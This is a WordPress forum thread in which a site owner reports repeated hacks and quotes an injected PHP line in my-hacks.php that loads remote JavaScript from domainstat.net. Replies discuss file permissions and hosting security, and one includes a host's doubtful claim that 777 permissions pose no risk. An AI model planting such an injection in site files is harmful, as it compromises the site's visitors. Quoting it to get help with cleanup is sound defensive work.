• My site has been hacked twice this month and I can’t figure out how. It begins with my-hacks.php, where WP tells me that there headers were already sent. Opening my-hacks reveals that this bit of code has somehow been added to the file:

    <? if (!defined(‘domainstat’)) { define(“domainstat”, “ok”); echo “<script language=’JavaScript’ type=’text/javascript’ src=’https://domainstat.net/stat.php’></script>&#8221;;}?>

    Deleting that bit of code causing all my plugin and admin.php files to stop working and stylsheet.css stops working. The last time this happened the hack got progressively worse, eventually changing all my post links to a new link that sent people to a hardcore porno video.

    How is this happening? Anyone know how I can prevent it? Fix it?? HELP!!

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  • There’s no easy solution for preventing write access to your files if your host is running Apache with your user ID.

    I should qualify this all by saying that I’ve never used this feature of Apache, so I might be wildly mistaken.

    Well, that’s fine. Just added one more to a list for my hosts tomorrow. Email them the list, then call them and get the straight skinny – I hope. I’ve been happy with these hosts, so far I’ve not had any problems, but maybe it’s time for them to “put up or shut up” in a way….

    Thanks again, skippy.

    I just spoke to the owner of my host, and he said it doesn’t matter if my file premissions are set to 777, no one outiside can write to my files. He mentioned it is a security feature in the php doc?

    I don’t recommend using 777 unless you have some programs that must write to the server like I do, but the defaults your sever setup SHOULD be fine.

    I am glad I left Powweb and Ace-host for tranqual hosting.

    I checked on powweb and it is happening on their servers as well.

    Does anyone know how to remove the script from my blog? I have my host watching my back now so it shouldn’t happen again but I want to remove the script so my page doesn’t take an hour to load.

    Does anyone know how to remove the script from my blog? I have my host watching my back now so it shouldn’t happen again but I want to remove the script so my page doesn’t take an hour to load.

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